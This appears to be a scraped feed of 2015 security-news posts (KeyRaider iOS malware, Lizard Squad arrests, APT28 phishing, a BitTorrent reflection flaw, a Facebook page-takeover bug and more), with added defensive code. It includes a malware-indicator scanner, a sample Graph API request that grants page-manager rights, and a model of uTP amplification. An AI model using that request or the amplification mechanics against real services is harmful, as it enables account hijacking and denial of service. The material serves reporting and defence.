KeyRaider Malware Steals Certificates, Keys and Account Data from Jailbroken iPhones
31.8.2015
Researchers have discovered a new strain of iOS malware dubbed KeyRaider that targets jailbroken devices and has the ability to steal certificates, private keys, and Apple account information. The malware already has claimed the private Apple account data of more than 225,000 victims. The KeyRaider malware was discovered by researchers at Palo Alto Networks, who were put onto the trail of the attack by a team of amateur enthusiasts in China called WeipTech that had come across a database that was storing the stolen Apple account data. The WeipTech team had heard multiple reports that some users’ Apple accounts were being hit with unauthorized purchases, and eventually found that users of jailbroken devices who had installed a specific “tweak”, or modification, were being targeted. User data was being gathered and uploaded to a remote server. They found a database on the server that contained more than 225,000 entries, some of which were in plaintext and others that were encrypted. The plaintext entries were Apple usernames, passwords, and GUIDs. “By reverse-engineering the jailbreak tweak, WeipTech found a piece of code that uses AES encryption with the fixed key ‘mischa07’. The encrypted usernames and passwords can be successfully decrypted using this static key. They then confirmed that the listed usernames were all Apple accounts and validated some of the credentials. The WeipTech researchers dumped around half of all entries in the database before a website administrator discovered them and shut down the service,” Claud Xiao of Palo Alto Networks wrote in a post explaining the attack and the KeyRaider malware. The WeipTech team contacted Palo Alto researchers about the findings, and the researchers quickly discovered that the tweak itself wasn’t stealing the data. Rather, the KeyRaider malware was doing the dirty work.
Right now, it appears that the malware only is spreading through the Cydia repositories for jailbroken iOS devices on a Chinese Apple fan site called Weiphone. “The malware hooks system processes through MobileSubstrate, and steals Apple account usernames, passwords and device GUID by intercepting iTunes traffic on the device. KeyRaider steals Apple push notification service certificates and private keys, steals and shares App Store purchasing information, and disables local and remote unlocking functionalities on iPhones and iPads,” Xiao said. The KeyRaider malware typically is installed alongside tweaks and apps uploaded by individual users on the Weiphone site. Xiao said in his analysis that evidence in the code points to a user named “mischa07”, a term that also happens to be the hard-coded key for the encrypted data in the database the WeipTech team found. The goal of the malware seems to be to allow attackers to make unauthorized in-app purchases and other purchases using the victims’ stolen Apple account information.
“The KeyRaider malicious code exists in Mach-O dynamic libraries that are used as plugins for the MobileSubstrate framework. Through MobileSubstrate APIs, the malware can hook arbitrary APIs in system processes or in other iOS apps,” Xiao said. KeyRaider accomplishes its feat of stealing sensitive user and device information by intercepting the communications between compromised devices and the iTunes App Store. “When the App Store client asks the user to input their Apple account for login, the information is sent to the App Store server via an SSL encrypted session. In the replacement function of SSLWrite, KeyRaider looks for this kind of login session, and searches for specific patterns to find the Apple account’s username, password and device’s GUID in the data being transferred. Next, in the replacement function for SSLRead, these credentials are encrypted using the AES algorithm with the static key ‘mischa07’, and then sent to the KeyRaider C2 server,” Xiao said. “In some samples, KeyRaider also hooks the apsd process, the daemon process responsible for Apple Push Notification Service on iOS systems. It hooks the SecItemCopyMatching function defined in the Security framework. This API is used to search keychain items that match a given search query.” The latter functionality is what enables KeyRaider to steal the certificate and private key from the user’s device, which is then sent, along with the GUID, to the attacker’s C2 server. The malware also gives the attackers the ability to download and install any paid app in the App Store for free, by using a victim’s stolen account information. Xiao said KeyRaider also has functionality that can allow an attacker to hold a victim’s phone for ransom. “It can locally disable any kind of unlocking operations, whether the correct passcode or password has been entered.
Also, it can send a notification message demanding a ransom directly using the stolen certificate and private key, without going through Apple’s push server. Because of this functionality, some of the previously used ‘rescue’ methods are no longer effective,” Xiao said. Palo Alto notified Apple of the attack last week and gave the company the stolen account information as well.
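The analysis above gives a defender three concrete indicators that live inside a MobileSubstrate plugin: the Mach-O container itself, the hard-coded AES key string, and references to the hooked APIs (SSLWrite, SSLRead, SecItemCopyMatching). The following triage script, added here as an example and not part of the Palo Alto Networks write-up, scores dynamic libraries on those indicators. The sample images, the directory path used in the usage call and the scoring rule are constructed for the example; the magic numbers are the standard Mach-O ones.

```python
import struct

# Indicators quoted in the analysis above: the hard-coded AES key and the
# APIs KeyRaider hooks through MobileSubstrate.
STATIC_KEY = b"mischa07"
HOOKED_APIS = (b"SSLWrite", b"SSLRead", b"SecItemCopyMatching")

# Mach-O magic numbers: 32-bit, 64-bit and fat (universal) images.
MACH_O_MAGICS = {0xFEEDFACE, 0xFEEDFACF, 0xCAFEBABE}


def is_macho(data: bytes) -> bool:
    """True if the first four bytes are a Mach-O magic in either byte order."""
    if len(data) < 4:
        return False
    big = struct.unpack(">I", data[:4])[0]
    little = struct.unpack("<I", data[:4])[0]
    return big in MACH_O_MAGICS or little in MACH_O_MAGICS


def scan_dylib(data: bytes) -> dict:
    """Score one MobileSubstrate plugin for KeyRaider-style indicators.

    Rule (constructed for this example): a Mach-O image that carries the
    static key and references at least one hooked credential/keychain API
    is flagged as suspicious. Either indicator alone only shows up in the
    report, so a legitimate tweak that hooks SSLRead is not flagged by itself.
    """
    macho = is_macho(data)
    hooked = [api.decode() for api in HOOKED_APIS if api in data]
    has_key = STATIC_KEY in data
    return {
        "macho": macho,
        "hooked_apis": hooked,
        "static_key": has_key,
        "suspicious": macho and has_key and bool(hooked),
    }


def scan_directory(files: dict) -> list:
    """files maps a path to its bytes; returns the paths flagged as suspicious."""
    return sorted(path for path, blob in files.items() if scan_dylib(blob)["suspicious"])


# Constructed sample images (not real KeyRaider samples): a little-endian
# 64-bit Mach-O magic, padding, then a fake string table.
MH_MAGIC_64_LE = b"\xcf\xfa\xed\xfe"
SAMPLE_MALICIOUS = (MH_MAGIC_64_LE + b"\x00" * 28
                    + b"MobileSubstrate\x00SSLWrite\x00SSLRead\x00mischa07\x00apsd\x00")
SAMPLE_BENIGN = (MH_MAGIC_64_LE + b"\x00" * 28
                 + b"MobileSubstrate\x00UIKit\x00SpringBoard\x00")

if __name__ == "__main__":
    # The directory is the usual MobileSubstrate plugin location on a
    # jailbroken device; the file names are made up for the example.
    print(scan_directory({
        "/Library/MobileSubstrate/DynamicLibraries/tweakA.dylib": SAMPLE_MALICIOUS,
        "/Library/MobileSubstrate/DynamicLibraries/tweakB.dylib": SAMPLE_BENIGN,
    }))
```

On a real device you would read each .dylib from the plugin directory into the dictionary passed to scan_directory; string matching is cheap enough to run over every plugin, and the per-file report tells you which indicator fired.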
Here's Top Features Expected in Next iPhone Release
31.8.2015
Only 9 days are left until Apple's annual iPhone launch event, where the company will show off various new products, but the obvious stars of the show will be the iPhone 6s and the iPhone 6s Plus.
The company has not officially announced the iPhone 6S and iPhone 6S Plus yet, but a series of new, high-resolution photographs obtained by 9to5Mac show some new features coming to its next-generation iPhone.
The new iPhones – likely called the iPhone 6S and 6S Plus – will be introduced at Apple's fall event on September 9.
The leaked photos give us a closer look at two of the iPhone's key new features: Force Touch and a larger FaceTime camera.
Here is the list of features the new iPhone 6S and iPhone 6S Plus are expected to include:
Force Touch
The new iPhone 6S would include Force Touch technology that Apple introduced with the Apple Watch, and haptic feedback.
Here's how it works:
When a user presses slightly harder on the screen, sensors in the screen detect the increased pressure and the device responds with haptic feedback.
This simply means that, like Apple Watch, iPhone would also provide shortcuts to common iOS tasks.
Here are some instances of how Force Touch will be used with the iPhone 6S and iPhone 6S Plus:
Turn-by-turn navigation in Maps
Getting song choices when force touching a track in Music app
Jumping to voicemail by force touching the phone icon
A Larger FaceTime Camera
Below is the leaked photo that shows a larger front-facing FaceTime camera on the new iPhone 6S (black), compared to a smaller one on the iPhone 6 (white) underneath it.
The FaceTime camera is designed for selfie lovers. It will help iPhone users take higher-quality selfies even in the dark, as it comes with its own flash as well.
The rear camera would be 12 megapixels, an increase over the 8-megapixel approach that iPhone 6 and 6 Plus offer.
4K Video Support
The larger 12-megapixel rear-facing camera on the iPhone 6S would be capable of shooting video in full 4K high-definition resolution.
However, the current iPhone 6's 8-megapixel camera is capable of shooting 1080p videos.
Let's wait for September 9 event!
Six U.K. Teens Arrested for using Lizard Squad's DDoS Tool
30.8.2015
Six British teenagers have been arrested and released on bail on suspicion of launching cyber attacks on websites and services with the help of Lizard Squad's DDoS attack tool, called Lizard Stresser.
Lizard Squad is infamous for hacking and knocking down the largest online gaming networks – PlayStation Network and Xbox Live – last year by launching massive Distributed Denial-of-Service (DDoS) attacks.
The notorious hacker group set up a website to let customers use its Lizard-branded DDoS-for-hire tool Lizard Stresser to launch similar DDoS attacks.
The six teens, arrested by the National Crime Agency, are accused of using Lizard Stresser DDoS tool to launch cyber attacks against a school, a national newspaper, gaming companies and a number of online retailers.
However, according to law enforcement, none of the teenagers is believed to be a member of Lizard Squad, nor to have had any connection with last year's Christmas hack against Sony's and Microsoft's gaming services.
All six suspects are alleged to have bought the DDoS tool using alternative payment services such as Bitcoin.
Regarding the arrests, Tony Adams, senior head of investigations for NCA's National Cyber Crime Unit, said:
By paying a comparatively small fee, tools like Lizard Stresser can cripple businesses financially and deprive people of access to important information and public services.
One of our key priorities is to engage with those on the fringes of cyber criminality, to help them understand the consequences of cyber crime and how they can channel their abilities into productive and lucrative legitimate careers.
Law enforcement did not name the teenagers, but their ages and home towns are given below:
An 18-year-old from Huddersfield, West Yorkshire
An 18-year-old from Manchester
A 16-year-old from Northampton
A 15-year-old from Stockport
A 17-year-old from Cardiff
A 17-year-old from Northolt, north-west London
All the six suspects have been bailed while two 18-year-olds from Manchester and Milton Keynes respectively were interviewed under caution.
Automating Metrics using RTIR REST API
30.8.2015
Metrics are an important part of incident response. You should know your average time to detect compromised systems and how successful phishing campaigns are against your users. To start successful metrics, you need to choose a taxonomy to use. In this example, we will be using the VERIS(1) taxonomy. It is well documented and allows you to compare yourself to the DBIR report.
One of the problems with metrics is the amount of time it takes to enter data and correlate it. While it may take less than 5 minutes to determine how many people responded to a phish, it may take up to 20 minutes to create the tickets in your tracking system. To greatly increase your efficiency and accuracy, scripting should be used.
RTIR(2) is an open source ticketing system for incident response based on Request Tracker. This system can be built based on the VERIS taxonomy by creating custom fields that match the categories. This system supports using a REST API(3) to automate the creation of tickets.
We need to create the following custom fields for our use case. Some of these will have static values and others will need to be entered as command-line arguments.
hacking.discovery_method, hacking.targeted, impact.security_incident, social.variety, social.vector, social.target, confidentiality.data.variety, misuse.variety
Additionally, we want to track other stats that aren't used in VERIS, but are very useful for tracking campaigns.
victim-username, ioc.attacker.ip, ioc.attacker.domain
Now that we have the basic breakdown of which fields we want to enter data into, we need to script it (4). Make sure you put your credentials into the script along with the IP address or DNS name of your server. The two main parts that you can adjust to fit any incident type are the arguments and the post_data. The ticket is created and then closed when the script completes.
To run this script as posted, do the following:
>rt-phishing.py --username bob --ip 127.0.0.1 --domain malware.bad --creator twebb --time 5
While metrics are important, they shouldn’t be demanding to create. Anything that your SOC does that doesn’t require lots of documentation should be easily scripted.
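The workflow above (build the ticket content from static VERIS values plus command-line arguments, POST it to the REST interface, then close the ticket) can be shown end to end with the RT REST 1.0 conventions: a POST to /REST/1.0/ticket/new whose content parameter carries "id: ticket/new" plus one "Field: value" line per attribute, custom fields written as CF.{name}: value, and a reply whose body reads "# Ticket N created." The script below is an added example in that style, not the author's rt-phishing.py linked in (4). The server URL, credentials, queue name and the sample custom-field values are placeholders to replace with your own; the argument names match the usage line above.

```python
import argparse
import re
import urllib.parse
import urllib.request

# Assumed deployment details for this example (placeholders, not from the post).
RT_BASE_URL = "https://rtir.example.org"
RT_USER = "apiuser"
RT_PASS = "change-me"
QUEUE = "Incident Reports"

# VERIS-style fields that are static for every phishing ticket. Sample values:
# map them to the enumerations you configured on your own custom fields.
STATIC_FIELDS = {
    "hacking.discovery_method": "Int - user reported",
    "hacking.targeted": "Opportunistic",
    "impact.security_incident": "Incident",
    "social.variety": "Phishing",
    "social.vector": "Email",
    "social.target": "End-user",
    "confidentiality.data.variety": "Credentials",
    "misuse.variety": "None",
}


def build_ticket_body(queue, subject, custom_fields, owner=None,
                      text="Phishing campaign (scripted)"):
    """Render the RT REST 1.0 'ticket/new' body; custom fields use CF.{name}: value."""
    lines = ["id: ticket/new", f"Queue: {queue}", f"Subject: {subject}"]
    if owner:
        lines.append(f"Owner: {owner}")
    lines.append(f"Text: {text}")
    for name, value in custom_fields.items():
        lines.append(f"CF.{{{name}}}: {value}")
    return "\n".join(lines) + "\n"


def parse_ticket_id(response_text):
    """Extract the ticket number from a reply such as
    'RT/4.4.4 200 Ok\\n\\n# Ticket 1234 created.'; None if creation failed."""
    match = re.search(r"# Ticket (\d+) created", response_text)
    return int(match.group(1)) if match else None


def rt_post(path, body):
    """POST one REST 1.0 request with form-encoded credentials (network call)."""
    data = urllib.parse.urlencode(
        {"user": RT_USER, "pass": RT_PASS, "content": body}).encode()
    with urllib.request.urlopen(f"{RT_BASE_URL}/REST/1.0/{path}", data=data) as resp:
        return resp.read().decode()


def create_and_close(args):
    """Create the phishing ticket, record the time spent, and resolve it."""
    fields = dict(STATIC_FIELDS)
    fields.update({
        "victim-username": args.username,
        "ioc.attacker.ip": args.ip,
        "ioc.attacker.domain": args.domain,
    })
    body = build_ticket_body(QUEUE, f"Phish: {args.domain} -> {args.username}",
                             fields, owner=args.creator)
    ticket = parse_ticket_id(rt_post("ticket/new", body))
    if ticket is None:
        raise SystemExit("ticket creation failed")
    # Log the analyst's minutes and resolve the ticket in one edit request.
    rt_post(f"ticket/{ticket}/edit", f"TimeWorked: {args.time}\nStatus: resolved\n")
    return ticket


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    for flag in ("--username", "--ip", "--domain", "--creator", "--time"):
        parser.add_argument(flag, required=True)
    print(create_and_close(parser.parse_args()))
```

Keeping the body builder and the reply parser separate from the network call means both can be unit-tested offline, which is where most scripting mistakes (a mistyped custom-field name, a value outside the field's enumeration) are cheapest to catch.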
1. http://veriscommunity.net/enums.html#section-incident_desc
2. https://www.bestpractical.com/rtir/
3. http://requesttracker.wikia.com/wiki/REST
4. https://github.com/tcw3bb/ISC_Posts/blob/master/RTIR-phish-template.py
Latest APT 28 Campaign Incorporates Fake EFF Spearphishing Scam
28.8.2015
Attackers, possibly associated with the Russian government, registered a phony Electronic Frontier Foundation domain earlier this month in an attempt to dupe users into thinking correspondence from the site was coming from the well-known privacy watchdog. The scheme, largely carried out via spear phishing, appears to be part of a larger campaign previously dubbed Pawn Storm. According to a blog post by the EFF’s Cooper Quintin on Thursday, the fake domain – electronicfrontierfoundation.org – was registered more than three weeks ago and quickly used as part of an attack alongside a recently patched Java zero day. Oracle patched the vulnerability, along with 200 other bugs, last month as part of its quarterly critical patch update, but that apparently hasn’t stopped the group, also known as APT 28, from carrying out attacks. For this one, Quintin claims spear phishing emails were sent to targets that contained links to the malicious, fake EFF site. Once the link is clicked, the site redirects the user to another page on the fake site that contains a Java applet. Assuming the user is running an old, vulnerable version of Java, it’s exploited and the attacker is granted free rein over their machine. “The attacker, now able to run any code on the user’s machine due to the Java exploit, downloads a second payload, which is a binary program to be executed on the target’s computer,” Quintin writes. The EFF believes that the path and filename used in the exploit are the same as those used in other attacks carried out by Pawn Storm, particularly Sednit. The Sednit payload, which was analyzed earlier this summer, downloads a .DLL file, which is executed and opens a backdoor to several attacker-controlled domains that exfiltrate data. Pawn Storm, which was given the moniker APT 28 in a 2014 FireEye report, has been active for years now, but most recently made headlines for carrying out a slew of attacks earlier this summer, including exploiting zero days in Flash, Microsoft, and Java.
The FireEye report noted that the attackers operated during business hours, on Moscow time, and use phishing that targets “privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.” The zero day in Java was actually the first in quite some time, more than two years, found plaguing the platform. Oracle claimed when it was patched, the vulnerability was being used to exploit a U.S.-based defense contractor and foreign military outfits. The group has also been seen carrying out attacks on NATO forces and White House staff in the past. The EFF is warning that users who haven’t patched the vulnerability in Java are still susceptible and that while the phishing domain has been reported for abuse, it hasn’t been taken offline yet.
BitTorrent Fixes Reflective DDoS Attack Security Flaw
28.8.2015
Two weeks ago, we reported how a serious flaw in the popular peer-to-peer BitTorrent file sharing protocols could be exploited to carry out a devastating distributed denial of service (DDoS) attack, allowing lone hackers with limited resources to take down large websites.
The good news is that the developers of BitTorrent have fixed the security issue in their service, which is used by hundreds of millions of users worldwide.
In a blog post published Thursday, BitTorrent announced that the flaw resided in a reference implementation of the Micro Transport Protocol (uTP) called libuTP, which is used by many popular BitTorrent clients such as μTorrent, Vuze and Mainline.
The San Francisco company also announced that it has rolled out a patch for its libuTP software that will stop miscreants from abusing the p2p protocol to conduct Distributed Reflective Denial-of-Service (DRDoS) attacks.
A DRDoS attack is a more sophisticated form of the conventional DDoS attack, in which open and misconfigured DNS (Domain Name System) servers can be used by anyone to launch high-bandwidth DDoS attacks on target websites.
The vulnerability was made public two weeks ago by a research team led by Florian Adamsky of the City University London.
The researchers showed how an attacker could send malicious data to vulnerable BitTorrent applications to flood a third-party target with data traffic up to 120 times larger than the original request.
Just by replacing the attacker's IP address in the malicious User Datagram Protocol (UDP) packet with the spoofed IP address of the target, a hacker could flood the target server with data traffic, effectively knocking it offline.
However, BitTorrent said the company has not yet seen such attacks exploited in the wild.
"Florian responsibly contacted [BitTorrent] to share his findings," Christian Averill from BitTorrent wrote in a blog post. "This gave our engineering team the opportunity to mitigate the possibility of such an attack."
According to the company, uTorrent, BitTorrent and BitTorrent Sync clients were all patched up earlier this month.
However, to fix the issue, the BitTorrent and uTorrent clients will require acknowledgment packets from connection initiators before providing responses.
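The fix described above is a reachability check: a responder must not serve large replies to an address that has never proven it can receive the responder's own packets. The toy model below, an added example that is not libuTP code and deliberately ignores the real uTP packet format, contrasts a responder that serves a data request on sight with one that insists on the initiator acknowledging its reply first. Packet sizes and the piece size are constructed so the amplification ratio can be computed; the IP addresses are documentation ranges.

```python
HEADER_BYTES = 20     # constructed uTP-style header size
PIECE_BYTES = 2400    # constructed size of one served piece


class UtpResponder:
    """Toy model of the responding side of a uTP connection."""

    def __init__(self, require_ack):
        self.require_ack = require_ack       # True models the patched behaviour
        self.syn_seen = set()                # sources we answered with a small state packet
        self.established = set()             # sources that acknowledged that answer

    def handle(self, src_ip, kind):
        """Return the number of bytes this responder sends back to src_ip."""
        if kind == "SYN":
            self.syn_seen.add(src_ip)
            return HEADER_BYTES              # small reply: cannot amplify much
        if kind == "ACK":
            if src_ip in self.syn_seen:      # only meaningful if src_ip received our reply
                self.established.add(src_ip)
            return 0
        if kind == "REQUEST":
            if self.require_ack and src_ip not in self.established:
                return 0                     # drop: initiator never proved reachability
            return HEADER_BYTES + PIECE_BYTES
        return 0


def spoofed_exchange(responder, victim_ip):
    """Reflection attempt: SYN and REQUEST arrive carrying the victim's source address.

    The sender never sees the responder's replies (they go to the victim), so it
    can never produce a valid ACK. Returns (bytes sent, bytes reflected, ratio).
    """
    sent = reflected = 0
    for kind in ("SYN", "REQUEST"):
        sent += HEADER_BYTES
        reflected += responder.handle(victim_ip, kind)
    return sent, reflected, reflected / sent


def legitimate_exchange(responder, peer_ip):
    """A genuine initiator acknowledges the reply before requesting data."""
    received = 0
    for kind in ("SYN", "ACK", "REQUEST"):
        received += responder.handle(peer_ip, kind)
    return received


if __name__ == "__main__":
    print("unpatched:", spoofed_exchange(UtpResponder(require_ack=False), "203.0.113.7"))
    print("patched:  ", spoofed_exchange(UtpResponder(require_ack=True), "203.0.113.7"))
    print("legit:    ", legitimate_exchange(UtpResponder(require_ack=True), "198.51.100.2"))
```

The interesting number is the ratio from spoofed_exchange: with the check disabled the responder sends 61 bytes to the victim for every byte the sender spent, while with the check enabled it sends only the 20-byte state packet and the ratio drops below 1, which is what makes the reflector useless for amplification. A real client is unaffected because it completes the handshake normally.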
Denial-of-service amplification attacks are not at all new. Such attacks have increased in recent years, and miscreants mostly take advantage of them to attack major sites.
Last year, we saw cyber criminals exploiting a security weakness in the home and small office routers in order to amplify the bandwidth of their attack.
In the same year, hackers reached new heights with a massive 400Gbps DDoS attack targeting the anti-DDoS protection firm CloudFlare.
Warning! How Hackers Could Hijack Your Facebook Fan Page With This Trick
28.8.2015
Facebook bounty hunter Laxman Muthiyah from India has recently discovered his third bug of this year in the widely popular social network website that just made a new record by touching 1 Billion users in a single day.
At the beginning of the year, Laxman discovered a serious flaw in the Facebook Graph API that allowed him to view, and possibly delete, other users' photo albums on Facebook, even without authentication.
Just after a month, Laxman uncovered another critical vulnerability in the social network platform that resided in the Facebook Photo Sync feature, that automatically uploads photos from your mobile device to a private Facebook album, which isn’t visible to any of your Facebook friends or other Facebook users.
However, the flaw discovered by Laxman could allow any third-party app to access and steal your personal photographs from the hidden Facebook Photo Sync album.
Hacking Any Facebook Page
Now, the latest bug in Laxman's list could allow attackers to take over control of your Facebook pages.
This time Laxman has found an issue with the "Facebook business pages" that are not specific to a single user account, but instead represent a business and are usually managed by a number of users.
However, Laxman found that third-party apps with limited permissions could take complete control of a Facebook business page, possibly making the victim permanently lose administrator access to the page.
Here's How:
Third-party Facebook applications are capable of performing a wide range of operations, including posting status updates on your behalf, publishing photos, and other tasks, but Facebook does not allow them to add or modify page admin roles.
Facebook allows a page administrator to assign different roles to different people in the organisation through manage_pages, a special access permission requested by third-party apps.
However, according to Laxman, an attacker can use a simple string of requests in an attempt to make himself an admin of a particular Facebook page.
Sample Request
The request looks something like this:
POST /PGID/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
role=MANAGER&user=X&business=B&access_token=AAAA…
Here, page PGID belongs to business B, and a request made with the manage_pages permission makes user 'X' a MANAGER (that is, an administrator) of the page.
This means these small changes in the request parameters could allow an attacker to gain complete control over your Facebook page.
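The lesson of the request above is that an authorization check for a privileged operation (changing page roles) has to look at more than the permission bit the token carries and the page-to-business relationship named in the parameters. The following model, added as an example and not Facebook's code or its actual fix, compares a check that only validates those two things with one that also requires the caller to be a first-party user token belonging to an existing admin of the page. The tokens, pages and the "kind" attribute are constructed; the parameter names are the ones shown in the request.

```python
# Constructed model of pages and tokens for the example (hypothetical data).
PAGES = {"PGID": {"business": "B", "admins": {"alice"}}}

TOKENS = {
    # An app token that a page admin granted the manage_pages permission.
    "AAAA-app": {"kind": "app", "user": "alice", "scopes": {"manage_pages"}},
    # The same admin acting directly (first-party user token).
    "AAAA-user": {"kind": "user", "user": "alice", "scopes": {"manage_pages"}},
    # A user who holds manage_pages for some other page but is not an admin of PGID.
    "AAAA-mallory": {"kind": "user", "user": "mallory", "scopes": {"manage_pages"}},
}


def _lookup(page_id, params):
    return PAGES.get(page_id), TOKENS.get(params.get("access_token"))


def authorize_role_change_vulnerable(page_id, params):
    """Checks only the permission bit and the business named in the request."""
    page, token = _lookup(page_id, params)
    if page is None or token is None:
        return False
    return "manage_pages" in token["scopes"] and page["business"] == params.get("business")


def authorize_role_change_fixed(page_id, params):
    """Role changes require a first-party user token of an existing page admin."""
    page, token = _lookup(page_id, params)
    if page is None or token is None:
        return False
    if page["business"] != params.get("business"):
        return False
    if token["kind"] != "user":          # no app token may change roles at all
        return False
    return token["user"] in page["admins"]


def apply_role_change(page_id, params, authorize):
    """Return the page's admin set after the request, using the given check.

    Does not mutate PAGES so the two policies can be compared side by side.
    """
    admins = set(PAGES[page_id]["admins"])
    if authorize(page_id, params) and params.get("role") == "MANAGER":
        admins.add(params["user"])
    return admins


# The request from the write-up, with constructed identifiers.
REQUEST = {"role": "MANAGER", "user": "X", "business": "B", "access_token": "AAAA-app"}

if __name__ == "__main__":
    print("vulnerable:", apply_role_change("PGID", REQUEST, authorize_role_change_vulnerable))
    print("fixed:     ", apply_role_change("PGID", REQUEST, authorize_role_change_fixed))
```

Under the first policy the app token adds 'X' to the admin set; under the second the same request is refused, while alice acting directly is still allowed and a non-admin user holding the permission for a different page is not. The general point for any API that separates delegated (app) and direct (user) authority: decide per operation which kinds of token may invoke it, and tie the decision to the caller's standing on the specific resource, not just to a scope string.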
Video Demonstration
Laxman has also provided a video demonstration that shows the attack in action. You can watch the video below, which walks you through the entire procedure:
Laxman reported the flaw to the Facebook security team and received the reward of $2500 USD as a part of Facebook's bug bounty program.
Though the social network has now fixed the loophole, you must always be aware of the permissions you grant to any third-party applications.
Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?'
28.8.2015
After all the revelations made by the Impact Team last week, this was something different from the leaked data that contained names, passwords and other details of Ashley Madison clients.
A dump from the leaked files reveals an awful plan by Avid Life Media (ALM), Ashley Madison's parent company, to launch an app called "What's your wife worth."
As the name says it all, the app would allow men to rate each other's wives.
Know Your Wife Worth
'What's your wife worth' was discovered in a June 2013 email exchange between Noel Biderman, ALM's chief executive, and Brian Offenheim, ALM's vice president of creative and design, in which Biderman suggested to Offenheim the probable outlook of the app.
He suggested options like "Choice should be 'post your wife' and 'bid on someone's wife'," also mentioning: "I am not sure we should be asking for real names—rather usernames."
To which Offenheim gave some feedback, by attaching a dummy of the app's sign up design, which appeared something like this:
Though Biderman liked it, the app's development was never completed and the idea was dropped, as one of Biderman's colleagues referred to the concept as horrible in the emails.
We are left in a dilemma: did that person call the app's development horrible, or the very idea of developing such an app?
There were more than 197,000 emails that were leaked from Biderman's inbox by the hackers calling themselves as the Impact Team last Friday.
Besides this, the hackers released personal information of more than 33 million Ashley Madison accounts, which led to suicides as well.
Mark's Milestone: 1 Billion People Uses Facebook in A Single Day
28.8.2015
Mark Zuckerberg announced in a Facebook post that on Monday Facebook set a record, with one billion people accessing Facebook in a single day.
Zuckerberg shared his happiness and thanked the world. He was overwhelmed with the milestone Facebook has touched and even shared a video expressing his emotions.
"[Facebook] just passed an important milestone," Zuckerberg wrote in a Facebook post on Thursday. "For the first time ever, one billion people used Facebook in a single day."
That means roughly 1 in 7 people on Earth connected with their friends and family using Facebook in a single day.
Feeling Connected Indeed!
So far, Facebook is the world's largest online social networking website with 1.5 Billion monthly active users. Comparatively, Twitter has 316 Million monthly active users.
Zuckerberg expressed pride in the Facebook community, as its members are the ones who helped him reach such a position.
His post was then swarmed with comments from his followers, which made for a good read, as people from different places around the world shared stories about how they met their long-lost friends and relatives, and made new ones too!
Also, similar stories followed with people thanking and congratulating the man behind Facebook.
No lazy Monday this week @Facebook, Menlo Park, California.
German Spy-Agency Trades Citizens' Metadata in Exchange for NSA's Xkeyscore
28.8.2015
This is Really Insane!!
Germany's top intelligence agency handed over details related to German citizen metadata just in order to obtain a copy of the National Security Agency's Main XKeyscore software, which was first revealed by Edward Snowden in 2013.
According to the new documents obtained by the German newspaper Die Zeit, the Federal Office for the Protection of the Constitution (BfV - Bundesamtes für Verfassungsschutz) traded data of its citizens for surveillance software from their US counterparts.
Germany and the United States signed an agreement that would allow German spies to obtain a copy of the NSA's flagship tool XKeyscore to analyse data gathered in Germany. In return, they covertly and illegally traded access to Germans' data with the NSA.
XKeyscore surveillance software program was designed by the National Security Agency to collect and analyse intercepted data it obtains traveling over a network.
The surveillance software is powerful enough to pull up more than 20 terabytes of data daily, including emails, chats, social media interactions, and even browsing histories, all in real time and without the need for any warrant, as The Hacker News reported in 2013.
It seems that when NSA demonstrated the XKeyscore software to Germany's domestic intelligence agency BfV back in 2011, the BfV was so impressed that it struck a deal with NSA to exchange data for computer software.
After two years of negotiation with the U.S., the German agency signed an agreement to receive the NSA spyware and deploy it to analyse data gathered on German citizens.
In return, the German intelligence agency promised to share their citizens metadata. According to Die Zeit, the document "Terms of Reference" stated: "The BfV will: To the maximum extent possible share all data relevant to NSA's mission".
The BfV did not fully inform Germany's data protection commissioner, nor did it inform the Parliamentary Control Panel, which oversees the BfV, about the deal it signed with the United States.
"Once again, I have to learn from the press of a new BfV-NSA contract and the impermissible transfer of data to the [United States] secret service," Green Party parliamentarian Hans-Christian Ströbele, a member of the Parliamentary Control Panel, told Die Zeit.
However, the BfV still received a lower level of access compared to the other non-U.S. "Five Eyes" nations, including the United Kingdom, Canada, Australia and New Zealand, who all had direct access to the main XKeyscore system.
Facebook M: Facebook's Answer to Siri, Cortana and Google Now
27.8.2015
Microsoft's 'Cortana', Google's 'Google Now', Apple's 'Siri', Now meet Facebook's 'M.'
Facebook's announcement to introduce their Personal Digital Assistant “M” comes with powers within the Facebook Messenger. It is a similar virtual assistant like Google Now, Apple's Siri and Microsoft's smart digital assistant Cortana.
It seems that all the intelligence residing within the personal digital assistants already on the market is nothing compared to M's capabilities, according to a Facebook post by David Marcus, Vice President of Messaging Products at Facebook.
Three days ago, Microsoft had boosted the powers of Android users by making Cortana accessible on Android devices. Now listening to Facebook's launch of 'M', rival companies would have definitely face-palmed!
What Can I Help You With?
The virtual assistant software "M" is truly going to support you by doing work on your behalf; the team at Facebook tested this service inside Facebook Messenger.
M behaves in a manner that takes the artificial intelligence of existing virtual assistant software to a whole new level.
As the interaction is as genuine as interacting with your pals, M can:
Get you suggestions
Availability and Non-availability of things
Deliver things when you are away
Make reservations
Talk to you like an actual person would
Though the answers to your questions are given by the intelligent M team at the other end, with M you have to type your enquiries, unlike rival services, where you can speak to manage the assistant's activity.
"M is a hybrid backed by Facebook employees [team] with customer service backgrounds, called M trainers, who can also make travel arrangements [as well as] appointments," Marcus wrote.
There are already many services, like Magic, Operator and TaskRabbit, that solve your requests by employing humans, but they do not have a massive audience.
M, on the other hand, is packed with the features of artificial intelligence as well as human intelligence.
M is currently in its Beta version and is accessible to a few hundred Bay Area Facebook users at this time.
The feature already looks like an impressive service, to give it a thought what expansions it could take in its stable versions!
British-born ISIS Hacker Killed in US Drone Strike in Syria
27.8.2015
Remember Team Poison?
It was the hacker group, active in 2012, known for gaining access to former Prime Minister Tony Blair's address book and then publishing information from it.
The British hacker who actually obtained the Prime Minister's address book and was jailed for six months in 2012, named Junaid Hussain, has been killed in a United States drone strike in Syria, a source familiar with the matter said on Wednesday.
Hussain was a British hacker who rose to prominence within Islamic State group in Syria as a top cyber expert to mastermind the ISIS online war.
The U.S. military conducted the operation; the British government was not involved in the killing of Hussain, a British citizen from Birmingham.
Junaid Hussain Killed in Raqqa
Hussain was killed in Raqqa, located in northern Syria, which has been treated as a safe place by ISIS.
The United States has yet to officially announce Hussain's death, which has not been verified by officials, beyond saying that the country launched airstrikes against ISIS on Tuesday near Raqqa.
"We have a high level of confidence [Hussain] was killed," one of the U.S. officials told CNN Wednesday.
